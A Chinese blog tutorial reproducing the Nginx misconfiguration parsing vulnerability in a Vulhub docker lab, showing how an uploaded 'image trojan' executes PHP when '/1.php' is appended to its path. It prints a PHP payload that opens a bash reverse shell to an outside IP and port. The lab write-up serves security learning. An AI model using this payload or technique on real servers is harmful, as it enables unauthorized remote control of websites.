网站首页 > 精选教程 正文
该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。[1] 在访问的图片路径后面,添加/.php,一个不存在的php文件,就能执行图片马里面的php代码。 图片马,针对的是网站管理员配置不当,黑客通过一张图片就能拿下一个网站。
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
- docker-compose build //可选
- docker-compose up -d
完成试验后,记得删除漏洞环境哦~~
- docker-compose down
- docker system prune -a -f //可选
简单访问一下,说明Vulhub的Nginx 解析漏洞环境搭建成功了
发现只能上传图片
直接访问:http://144.34.162.13/uploadfiles/nginx.png
再访问一下:http://144.34.162.13/uploadfiles/nginx.png/1.php
下载下来这张图片,然后上传,掏出burpsuite进行重放,修改图片马里面的php代码。
<?php system("bash -c 'bash -i &>/dev/tcp/174.137.58.6/8888 0>&1'");?>
再通过burpsuite访问这个图片的路径,尽管504错误,但是
反弹shell成功了
参考
- ^Nginx 解析漏洞复现 https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/
猜你喜欢
- 2024-10-03 提示“504连接源站超时”是怎么回事
- 2024-10-03 蓝易云 - 如何优化Nginx服务进程详细。
- 2024-10-03 微服务架构统一异常监控Sentry 微服务统一异常处理
- 2024-10-03 详解Nginx的rewrite应用 nginx rewrite作用
- 2024-10-03 nginx httpstatus 408 研究 nginx配置负载均衡
- 2024-10-03 学习Vulhub的Nginx 文件名逻辑漏洞(CVE-2013-4547)
- 2024-10-03 服务器排障nginx 499 错误地解决 服务器常见报错代码
- 2024-10-03 网络抓包定位504 gateway timeout问题
- 2024-10-03 nginx 500 502 504 区别 nginx的502
- 2024-10-03 网站报错504怎么办? 网站打不开显示504啥意思?
你 发表评论:
欢迎- 最近发表
-
- 我的世界光影MOD下载(我的世界光影mod下载安装)
- 我的世界1.7/1.8VoxelMap小地图MOD下载
- 我的世界1.7.10多世界 整合包(我的世界1.7.10forge整合包)
- 我的世界1.8最好用的修改器下载(我的世界1.8最好用的修改器下载安装)
- 我的世界更多弯曲动作MOD下载(我的世界更多弯曲动作mod下载手机版)
- 我的世界龙珠MOD下载(我的世界龙珠模组整合包下载)
- 我的世界1.7.10以太2 下载(我的世界以太2mod1.12.2)
- 我的世界虚拟人生MOD下载分享(我的世界虚拟人生下载安装)
- 我的世界无正版账号的简单联机方法(非网易版,仅适用于局域网)
- “我的语言极限,即是我的世界的极限。” ——《On Java》书籍推荐
- 标签列表
-
- nginx反向代理 (57)
- nginx日志 (56)
- nginx限制ip访问 (62)
- mac安装nginx (55)
- java和mysql (59)
- java中final (62)
- win10安装java (72)
- java启动参数 (64)
- java链表反转 (64)
- 字符串反转java (72)
- java逻辑运算符 (59)
- java 请求url (65)
- java信号量 (57)
- java定义枚举 (59)
- java字符串压缩 (56)
- java中的反射 (59)
- java 三维数组 (55)
- java插入排序 (68)
- java线程的状态 (62)
- java异步调用 (55)
- java中的异常处理 (62)
- java锁机制 (54)
- java静态内部类 (55)
- java怎么添加图片 (60)
- java 权限框架 (55)
本文暂时没有评论,来添加一个吧(●'◡'●)